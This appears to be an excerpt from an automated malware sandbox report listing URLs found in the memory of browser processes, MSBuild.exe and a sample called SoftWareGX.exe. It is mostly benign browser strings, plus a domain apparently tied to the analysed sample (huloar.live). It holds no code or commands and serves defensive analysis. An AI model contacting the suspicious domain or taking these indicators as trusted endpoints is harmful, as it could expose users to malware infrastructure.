                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000011.00000003.1427760642.000046FC0312B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427413920.000046FC0317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432043794.000046FC02EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432722007.000046FC032C6000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432562852.000046FC02525000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427726089.000046FC0326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1427673944.000046FC03228000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1432092277.000046FC02C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
                Source: chromecache_698.18.drString found in binary or memory: http://www.broofa.com
                Source: MSBuild.exe, 0000000F.00000002.2009908390.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, jwb1v3.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 00000011.00000003.1446580751.000046FC02498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: Reporting and NEL.22.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
                Source: Reporting and NEL.22.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 00000011.00000003.1424321929.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1419160022.000046FC025C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 00000011.00000003.1446816707.000046FC035C0000.00000004.00000800.00020000.00000000.sdmp, chromecache_698.18.dr, chromecache_702.18.drString found in binary or memory: https://apis.google.com
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.dr, HubApps Icons.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                Source: 000003.log11.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                Source: chrome.exe, 00000011.00000003.1446870409.000046FC035A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=en&family=Product
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
                Source: chromecache_698.18.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://gaana.com/
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/M
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/P
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Z
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/a
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/d
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/n
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/u
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/x
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Y
                Source: chrome.exe, 00000011.00000003.1456244767.000046FC03A9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1453168510.000046FC0400C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1453273412.000046FC04026000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1411127055.0000164000878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                Source: msedge.exe, 00000013.00000002.1551181144.00000C34002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000011.00000003.1450564540.000046FC03924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: 1ddcd8e3-07be-4b08-a481-09c222a4e74b.tmp.22.drString found in binary or memory: https://hbx.media.net
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huloar.live
                Source: MSBuild.exe, 0000000F.00000002.2006634073.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://huloar.live/
                Source: b2cdda6f-d1c8-43db-a84e-95e5f41ff4ad.tmp.21.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                Source: 2cc80dabc69f58b6_1.21.dr, 4cb013792b196a35_1.21.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                Source: 2noh4e.15.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: chrome.exe, 00000011.00000003.1424375121.000046FC029A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000011.00000003.1412646213.0000164000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000011.00000003.1452230131.000046FC03F30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardF
                Source: chrome.exe, 00000011.00000003.1410073257.000016400071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
